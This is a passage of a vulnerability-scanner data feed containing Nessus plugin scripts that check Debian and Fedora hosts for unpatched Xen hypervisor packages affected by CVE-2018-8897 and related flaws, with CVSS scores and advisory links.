script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-8897\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-10471\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-10472\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-10981\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-10982\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/xen\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/xen\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2018/dsa-4201\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the xen packages.\n\nFor the stable distribution (stretch), these problems have been fixed\nin version 4.8.3+xsa262+shim4.10.0+comet3-1+deb9u6.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"libxen-4.8\", reference:\"4.8.3+xsa262+shim4.10.0+comet3-1+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libxen-dev\", reference:\"4.8.3+xsa262+shim4.10.0+comet3-1+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libxenstore3.0\", reference:\"4.8.3+xsa262+shim4.10.0+comet3-1+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"xen-hypervisor-4.8-amd64\", reference:\"4.8.3+xsa262+shim4.10.0+comet3-1+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"xen-hypervisor-4.8-arm64\", reference:\"4.8.3+xsa262+shim4.10.0+comet3-1+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"xen-hypervisor-4.8-armhf\", reference:\"4.8.3+xsa262+shim4.10.0+comet3-1+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"xen-system-amd64\", reference:\"4.8.3+xsa262+shim4.10.0+comet3-1+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"xen-system-arm64\", reference:\"4.8.3+xsa262+shim4.10.0+comet3-1+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"xen-system-armhf\", reference:\"4.8.3+xsa262+shim4.10.0+comet3-1+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"xen-utils-4.8\", reference:\"4.8.3+xsa262+shim4.10.0+comet3-1+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"xen-utils-common\", reference:\"4.8.3+xsa262+shim4.10.0+comet3-1+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"xenstore-utils\", reference:\"4.8.3+xsa262+shim4.10.0+comet3-1+deb9u6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:20:32", "description": "x86: mishandling of debug exceptions [XSA-260, CVE-2018-8897] x86\nvHPET interrupt injection errors [XSA-261] (#1576089) qemu may drive\nXen into unbounded loop [XSA-262]\n\n----\n\nupdate to xen-4.10.1\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 11, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-01-03T00:00:00", "title": "Fedora 28 : xen (2018-a7ac26523d)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10981", "CVE-2018-8897", "CVE-2018-10982"], "modified": "2019-01-03T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:xen", "cpe:/o:fedoraproject:fedora:28"], "id": "FEDORA_2018-A7AC26523D.NASL", "href": "https://www.tenable.com/plugins/nessus/120686", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-a7ac26523d.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(120686);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2018-10981\", \"CVE-2018-10982\", \"CVE-2018-8897\");\n script_xref(name:\"FEDORA\", value:\"2018-a7ac26523d\");\n\n script_name(english:\"Fedora 28 : xen (2018-a7ac26523d)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"x86: mishandling of debug exceptions [XSA-260, CVE-2018-8897] x86\nvHPET interrupt injection errors [XSA-261] (#1576089) qemu may drive\nXen into unbounded loop [XSA-262]\n\n----\n\nupdate to xen-4.10.1\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-a7ac26523d\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected xen package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8897\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:28\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^28([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 28\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC28\", reference:\"xen-4.10.1-2.fc28\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xen\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:19:55", "description": "x86: mishandling of debug exceptions [XSA-260, CVE-2018-8897] x86\nvHPET interrupt injection errors [XSA-261] (#1576089) qemu may drive\nXen into unbounded loop [XSA-262]\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 21, "cvss3": {"score": 8.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"}, "published": "2018-05-17T00:00:00", "title": "Fedora 27 : xen (2018-98684f429b)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10981", "CVE-2018-8897", "CVE-2018-10982"], "modified": "2018-05-17T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:27", "p-cpe:/a:fedoraproject:fedora:xen"], "id": "FEDORA_2018-98684F429B.NASL", "href": "https://www.tenable.com/plugins/nessus/109875", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-98684f429b.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(109875);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2018-10981\", \"CVE-2018-10982\", \"CVE-2018-8897\");\n script_xref(name:\"FEDORA\", value:\"2018-98684f429b\");\n\n script_name(english:\"Fedora 27 : xen (2018-98684f429b)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"x86: mishandling of debug exceptions [XSA-260, CVE-2018-8897] x86\nvHPET interrupt injection errors [XSA-261] (#1576089) qemu may drive\nXen into unbounded loop [XSA-262]\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-98684f429b\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected xen package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:27\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^27([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 27\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC27\", reference:\"xen-4.9.2-3.fc27\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xen\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:18:57", "description": "x86: mishandling of debug exceptions [XSA-260, CVE-2018-8897] x86\nvHPET interrupt injection errors [XSA-261, CVE-2018-10982] (#1576089)\nqemu may drive Xen into unbounded loop [XSA-262, CVE-2018-10981]\n(#1576680)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 21, "cvss3": {"score": 8.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"}, "published": "2018-05-29T00:00:00", "title": "Fedora 26 : xen (2018-7cd077ddd3)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10981", "CVE-2018-8897", "CVE-2018-10982"], "modified": "2018-05-29T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:xen", "cpe:/o:fedoraproject:fedora:26"], "id": "FEDORA_2018-7CD077DDD3.NASL", "href": "https://www.tenable.com/plugins/nessus/110169", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-7cd077ddd3.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(110169);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2018-10981\", \"CVE-2018-10982\", \"CVE-2018-8897\");\n script_xref(name:\"FEDORA\", value:\"2018-7cd077ddd3\");\n\n script_name(english:\"Fedora 26 : xen (2018-7cd077ddd3)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"x86: mishandling of debug exceptions [XSA-260, CVE-2018-8897] x86\nvHPET interrupt injection errors [XSA-261, CVE-2018-10982] (#1576089)\nqemu may drive Xen into unbounded loop [XSA-262, CVE-2018-10981]\n(#1576680)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-7cd077ddd3\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected xen package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/29\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"xen-4.8.3-5.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xen\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T09:39:15", "description": "Multiple vulnerabilities have been discovered in the Xen hypervisor,\nwhich could result in denial of service, informations leaks or\nprivilege escalation.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n4.1.6.lts1-14.\n\nWe recommend that you upgrade your xen packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.", "edition": 17, "cvss3": {"score": 8.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"}, "published": "2018-05-29T00:00:00", "title": "Debian DLA-1383-1 : xen security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10981", "CVE-2018-8897", "CVE-2018-10982"], "modified": "2018-05-29T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:xen-hypervisor-4.1-amd64", "p-cpe:/a:debian:debian_linux:xen-system-i386", "p-cpe:/a:debian:debian_linux:xen-utils-4.1", "p-cpe:/a:debian:debian_linux:xen-system-amd64", "p-cpe:/a:debian:debian_linux:xenstore-utils", "p-cpe:/a:debian:debian_linux:xen-docs-4.1", "p-cpe:/a:debian:debian_linux:libxen-ocaml", "p-cpe:/a:debian:debian_linux:libxen-ocaml-dev", "p-cpe:/a:debian:debian_linux:libxenstore3.0", "cpe:/o:debian:debian_linux:7.0", "p-cpe:/a:debian:debian_linux:xen-hypervisor-4.1-i386", "p-cpe:/a:debian:debian_linux:xen-utils-common", "p-cpe:/a:debian:debian_linux:libxen-dev", "p-cpe:/a:debian:debian_linux:libxen-4.1"], "id": "DEBIAN_DLA-1383.NASL", "href": "https://www.tenable.com/plugins/nessus/110159", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1383-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(110159);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2018-10981\", \"CVE-2018-10982\", \"CVE-2018-8897\");\n\n script_name(english:\"Debian DLA-1383-1 : xen security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple vulnerabilities have been discovered in the Xen hypervisor,\nwhich could result in denial of service, informations leaks or\nprivilege escalation.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n4.1.6.lts1-14.\n\nWe recommend that you upgrade your xen packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2018/05/msg00015.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/xen\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libxen-4.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libxen-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libxen-ocaml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libxen-ocaml-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libxenstore3.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:xen-docs-4.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:xen-hypervisor-4.1-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:xen-hypervisor-4.1-i386\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:xen-system-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:xen-system-i386\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:xen-utils-4.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:xen-utils-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:xenstore-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"libxen-4.1\", reference:\"4.1.6.lts1-14\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libxen-dev\", reference:\"4.1.6.lts1-14\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libxen-ocaml\", reference:\"4.1.6.lts1-14\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libxen-ocaml-dev\", 